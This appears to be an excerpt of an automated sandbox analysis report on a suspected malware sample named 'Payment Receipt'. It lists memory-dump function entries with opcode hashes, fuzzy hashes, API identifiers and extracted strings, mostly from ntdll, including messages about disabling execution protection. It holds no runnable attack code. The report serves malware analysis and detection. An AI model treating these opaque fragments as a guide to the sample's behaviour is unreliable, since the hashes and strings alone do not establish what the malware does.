                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0e9076287c5dd130fc5059f7405ea8df75628fc9701ba1ef9f02754a202552fe
                                                                      • Instruction ID: c360d13b1aa07eecf759689180e49c5fd820626c9539402066adfb871a3a5da9
                                                                      • Opcode Fuzzy Hash: 0e9076287c5dd130fc5059f7405ea8df75628fc9701ba1ef9f02754a202552fe
                                                                      • Instruction Fuzzy Hash: 2A90022921340002D5807158540860A0045E7D2212F99D819A1415958CCA55C97D5321
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 201c64ee9fb9dd8a6629e3865507532926fae8164b32dc3eafbb3fe24a0df28d
                                                                      • Instruction ID: 1630573b802174b7b3c74e1393f28340896bcb95a28589d1b2fc556de0791573
                                                                      • Opcode Fuzzy Hash: 201c64ee9fb9dd8a6629e3865507532926fae8164b32dc3eafbb3fe24a0df28d
                                                                      • Instruction Fuzzy Hash: E390022120544442D50075585408A060045E7D1215F59D415A2464995DC775C965A231
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7f7b6da07615d885aede9b908f31f9c1ef784f820c56a045e3c221267342fb66
                                                                      • Instruction ID: f8d1a74bff9db89bd23e2012b10e3ea3adc276b4297d855ce802f05e4bdaca93
                                                                      • Opcode Fuzzy Hash: 7f7b6da07615d885aede9b908f31f9c1ef784f820c56a045e3c221267342fb66
                                                                      • Instruction Fuzzy Hash: 1F90022130140003D540715854186064045F7E2311F59D415E1814954CDA55C96A5322
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d1e3aef3fa6c0c960e85f2596305ba08debdc88199295c9512731a16715cfde
                                                                      • Instruction ID: b80dbb9a21f128c9a447c68ac2a862c4d73916438f4d5fc71643ed023c7e1f3b
                                                                      • Opcode Fuzzy Hash: 8d1e3aef3fa6c0c960e85f2596305ba08debdc88199295c9512731a16715cfde
                                                                      • Instruction Fuzzy Hash: A0900221242441525945B15844045074046F7E1251799C416A2814D50CC666D96AD721
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: 330c1ad558e58612efa87d7167b275dc8ec98c666b876f25348a944aa08fd141
                                                                      • Instruction ID: 1086b1e93a157f635e3547459174d4960ddaed1900142110c391427b14a4d478
                                                                      • Opcode Fuzzy Hash: 330c1ad558e58612efa87d7167b275dc8ec98c666b876f25348a944aa08fd141
                                                                      • Instruction Fuzzy Hash: 985116B6E04256AFCB15DFAC8C8497EFBFCBB48240B548169F455DB649D334DE4087A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: 00cfebeb43dede21c6cbb94e61292669edac3947fdd2d9f2393dcbca8799a58a
                                                                      • Instruction ID: 25880c8c99db5c2caf385e76717894a4c3adbd8574b40d1feb5fd1783398754a
                                                                      • Opcode Fuzzy Hash: 00cfebeb43dede21c6cbb94e61292669edac3947fdd2d9f2393dcbca8799a58a
                                                                      • Instruction Fuzzy Hash: 2D51E675A00646EECB64DF6CCCA097EBBF9EB44204F04845DE9D6D7642E7B4DA408760
                                                                      Strings
                                                                      • ExecuteOptions, xrefs: 016146A0
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016146FC
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01614725
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01614787
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01614655
                                                                      • Execute=1, xrefs: 01614713
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01614742
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      • Opcode ID: 3df0f738fcf051c52f9863b83bbb06b36a9b3ba543be2226ed3df548dcc35fc9
                                                                      • Instruction ID: 3e3af68dcfec34329da07cc4a737dba287b182ec3f5d4faacc26ed7f564bcd3b
                                                                      • Opcode Fuzzy Hash: 3df0f738fcf051c52f9863b83bbb06b36a9b3ba543be2226ed3df548dcc35fc9
                                                                      • Instruction Fuzzy Hash: FB510A31A0021A7AEF21EAADDC85FAD7BB8FF59708F140499D505AF181EB709A41CF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 1302938615-699404926
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$[$]:%u
                                                                      • API String ID: 48624451-2819853543
                                                                      Strings
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016102E7
                                                                      • RTL: Re-Waiting, xrefs: 0161031E
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016102BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0161728C
                                                                      Strings
                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01617294
                                                                      • RTL: Re-Waiting, xrefs: 016172C1
                                                                      • RTL: Resource at %p, xrefs: 016172A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 885266447-605551621
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$]:%u
                                                                      • API String ID: 48624451-3050659472
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280